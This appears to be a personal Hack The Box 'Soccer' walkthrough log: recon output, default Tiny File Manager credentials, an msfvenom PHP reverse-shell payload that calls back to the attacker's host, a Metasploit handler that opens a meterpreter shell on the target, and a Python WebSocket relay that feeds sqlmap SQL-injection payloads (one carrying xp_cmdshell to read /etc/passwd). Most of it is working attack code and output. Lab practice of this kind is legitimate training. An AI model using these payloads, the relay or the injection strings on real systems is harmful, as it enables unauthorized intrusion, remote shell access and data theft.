https://app.hackthebox.com/machines/Soccer
┌──(kwkl㉿kwkl)-[~]
└─$ cat /etc/hosts 1 ⨯
127.0.0.1 localhost
127.0.1.1 kwkl.kwkl kwkl
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.187.153 unika.htb
10.129.187.172 thetoppers.htb
10.129.187.172 s3.thetoppers.htb
#10.129.235.232 megacorp.com
#
#
10.10.11.196 stocker.htb
10.10.11.196 dev.stocker.htb
10.10.11.194 soccer.htb
┌──(kwkl㉿kwkl)-[~/桌面/burp]
└─$ nmap -A 10.10.11.194 -T4 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:46 HKT
Nmap scan report for 10.10.11.194 (10.10.11.194)
Host is up (0.99s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| informix:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=3/3%Time=640208C3%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.63 seconds
┌──(kwkl㉿kwkl)-[~/桌面/burp]
┌──(kwkl㉿kwkl)-[~]
└─$ gobuster dir -u soccer.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 1 ⨯
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://soccer.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2023/03/04 11:51:23 Starting gobuster in directory enumeration mode
===============================================================
/tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 9478 / 87665 (10.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/03/04 12:04:41 Finished
===============================================================
search exploit
Download ZIP with latest version from master branch.
Just copy the tinyfilemanager.php to your webspace - thats all You can also change the file name from “tinyfilemanager.php” to something else, you know what i meant for.
Default username/password: admin/admin@123 and user/12345.
⚠️ Warning: Please set your own username and password in $auth_users
before use. password is encrypted with password_hash()
. to generate new password hash here
To enable/disable authentication set $use_auth
to true or false.
ℹ️ Add your own configuration file config.php in the same folder to use as additional configuration file.
ℹ️ To work offline without CDN resources, use offline branch
Try username password
Try user/12345.
Try admin/admin@123
Tiny File Manager 2.4.3
have upload file privilege
search exploit:
generous the horse
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ cat ~/shell.php 1 ⨯
/*<?php /**/ error_reporting(0); $ip = '10.10.16.9'; $port = 5555; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=5555 -o shell.php
──(kwkl㉿kwkl)-[~]
└─$ msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.2.26-dev ]
+ -- --=[ 2265 exploits - 1189 auxiliary - 404 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
1 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation
2 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent Yes ABRT sosreport Privilege Escalation
3 exploit/windows/misc/cve_2022_28381_allmediaserver_bof 2022-04-01 good No ALLMediaServer 1.6 SEH Buffer Overflow
4 exploit/windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow
5 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
6 exploit/linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution
7 exploit/windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow
8 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
9 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal
10 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure
11 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
12 exploit/linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation
13 exploit/windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell
14 exploit/windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow
15 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
16 exploit/freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution
17 exploit/windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow
18 exploit/windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow
19 exploit/windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit
20 exploit/linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow
21 exploit/linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow
22 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
23 exploit/windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution
24 exploit/windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
25 exploit/windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
26 exploit/windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow
27 exploit/windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
28 exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow
29 exploit/windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow
30 exploit/multi/handler manual No Generic Payload Handler
31 exploit/windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow
32 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution
33 exploit/windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection
34 auxiliary/dos/misc/ibm_tsm_dos 2015-12-15 normal No IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
35 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
36 exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
37 exploit/windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
38 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
39 exploit/windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
40 exploit/windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
41 exploit/windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free
42 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
43 exploit/windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free
44 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
45 exploit/windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow
46 auxiliary/gather/eventlog_cred_disclosure 2014-11-05 normal No ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure
47 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload
48 exploit/unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution
49 auxiliary/dos/http/metasploit_httphandler_dos 2019-09-04 normal No Metasploit HTTP(S) handler DoS
50 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution
51 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
52 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
53 exploit/linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation
54 auxiliary/server/dns/native_server normal No Native DNS Server (Example)
55 exploit/windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
56 exploit/windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
57 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
58 exploit/windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
59 exploit/linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution
60 exploit/windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess
61 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
62 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS
63 exploit/osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack
64 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE
65 exploit/windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow
66 exploit/windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow
67 exploit/windows/http/sitecore_xp_cve_2021_42237 2021-11-02 excellent Yes Sitecore Experience Platform (XP) PreAuth Deserialization RCE
68 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS
69 auxiliary/server/teamviewer_uri_smb_redirect normal No TeamViewer Unquoted URI Handler SMB Redirect
70 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
71 exploit/windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow
72 exploit/windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow
73 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
74 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
75 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
76 exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload
77 auxiliary/admin/http/wp_gdpr_compliance_privesc 2018-11-08 normal Yes WordPress WP GDPR Compliance Plugin Privilege Escalation
78 exploit/windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
79 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
80 exploit/windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow
81 exploit/linux/http/zyxel_ztp_rce 2022-04-28 excellent Yes Zyxel Firewall ZTP Unauthenticated Command Injection
82 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload
83 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation
Interact with a module by name or index. For example info 83, use 83 or use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/
set payload php/bind_perl set payload php/exec set payload php/meterpreter/reverse_tcp
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp_uuid
set payload php/bind_php set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter_reverse_tcp
set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_perl
set payload php/download_exec set payload php/meterpreter/bind_tcp_uuid set payload php/reverse_php
msf6 exploit(multi/handler) > set payload php/meterpreter/
set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcp
set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload php/meterpreter/
set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcp
set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.9
lhost => 10.10.16.9
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > ls
[*] exec: ls
allowed.userlist Cookies google-chrome-stable_current_amd64.deb logs raw-md5 TransportSecurity 公共
allowed.userlist.passwd Cookies-journal GPUCache machineid respondehash1.txt User 圖片
Backups Crashpad hash.txt module13 respondehash.txt vaccinhash.txt 影片
blob_storage ctf4 HAsIXULC.html msf 'Service Worker' vpy3.9 文件
Cache ctf8 HODL 'Network Persistent State' 'Session Storage' vulhub 桌面
CachedData databases JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar paused.conf shell.php WebStorage 模板
CachedExtensions Dictionaries languagepacks.json Preferences shell.sh worknotes.txt 音樂
'Code Cache' flag.txt 'Local Storage' prod.dtsConfig solve_pow.py 下载
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.16.9 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.9:5555
[*] Sending stage (39927 bytes) to 10.10.11.194
[*] Meterpreter session 1 opened (10.10.16.9:5555 -> 10.10.11.194:52842) at 2023-03-05 11:12:21 +0800
meterpreter > sysinfo
Computer : soccer
OS : Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter > id
[-] Unknown command: id
meterpreter > id
[-] Unknown command: id
meterpreter > os-shell
[-] Unknown command: os-shell
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
meterpreter > shell
Process 1689 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
shell.php
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1127,fd=6),("nginx",pid=1126,fd=6))
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:3000 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:9091 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:* users:(("nginx",pid=1127,fd=7),("nginx",pid=1126,fd=7))
tcp LISTEN 0 128 [::]:22 [::]:*
cat /etc/nginx.conf
cat: /etc/nginx.conf: No such file or directory
cat /etc/hosts
127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb
127.0.1.1 ubuntu-focal ubuntu-focal
find / -type d -name dstat 2>/dev/null
/usr/share/doc/dstat
/usr/share/dstat
/usr/local/share/dstat
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /usr/local/share/dstat
/bin/sh: 10: cd: can't cd to /usr/local/share/dstat
ls
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
id
pwd
Terminate channel 0? [y/N] n
pwd
pwd
Terminate channel 0? [y/N] n
Terminate channel 0? [y/N] n
find soc-player.soccer.htb
[sudo] kwkl 的密码:
┌──(kwkl㉿kwkl)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kwkl.kwkl kwkl
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.187.153 unika.htb
10.129.187.172 thetoppers.htb
10.129.187.172 s3.thetoppers.htb
#10.129.235.232 megacorp.com
#
#
10.10.11.196 stocker.htb
10.10.11.196 dev.stocker.htb
10.10.11.194 soccer.htb
10.10.11.194 soc-player.soccer.htb
try sqlmap
try sqlmap
sign up & login
try ws middle ware
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ cat ws.py
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
ws_server = "ws://soc-player.soccer.htb:9091/"
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
# For our case, format the payload in JSON
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
data = '{"id":"%s"}' % message
ws.send(data)
resp = ws.recv()
ws.close()
if resp:
return resp
else:
return ''
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
pass
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 ws.py
[+] Starting MiddleWare Server
[+] Send payloads in http://localhost:8081/?id=*
127.0.0.1 - - [05/Mar/2023 11:39:06] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:09] "GET /?id=1&ZLTO=7210%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:15] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:26] "GET /?id=1%2C%27%28%29%2C%28.%22%29%2C HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:31] "GET /?id=1%27RWoWuw%3C%27%22%3EgHqXRX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:35] "GET /?id=1%29%20AND%207838%3D9274%20AND%20%289743%3D9743 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:40] "GET /?id=1%20AND%207762%3D3250 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:46] "GET /?id=1%20AND%204911%3D9784--%20GhqF HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:02] "GET /?id=1%27%29%20AND%204484%3D4965%20AND%20%28%27RbjR%27%3D%27RbjR HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:06] "GET /?id=1%27%20AND%203834%3D5208%20AND%20%27VqnP%27%3D%27VqnP HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:10] "GET /?id=%28SELECT%20%28CASE%20WHEN%20%281185%3D6285%29%20THEN%201%20ELSE%20%28SELECT%206285%20UNION%20SELECT%206895%29%20END%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:15] "GET /?id=1%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%286667%3D6667 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:21] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:31] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29--%20VmOL HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:36] "GET /?id=1%27%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%28%27vgZl%27%3D%27vgZl HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:43] "GET /?id=1%27%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%27FMfq%27%3D%27FMfq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:50] "GET /?id=1%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%284381%3D4381 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:54] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 -
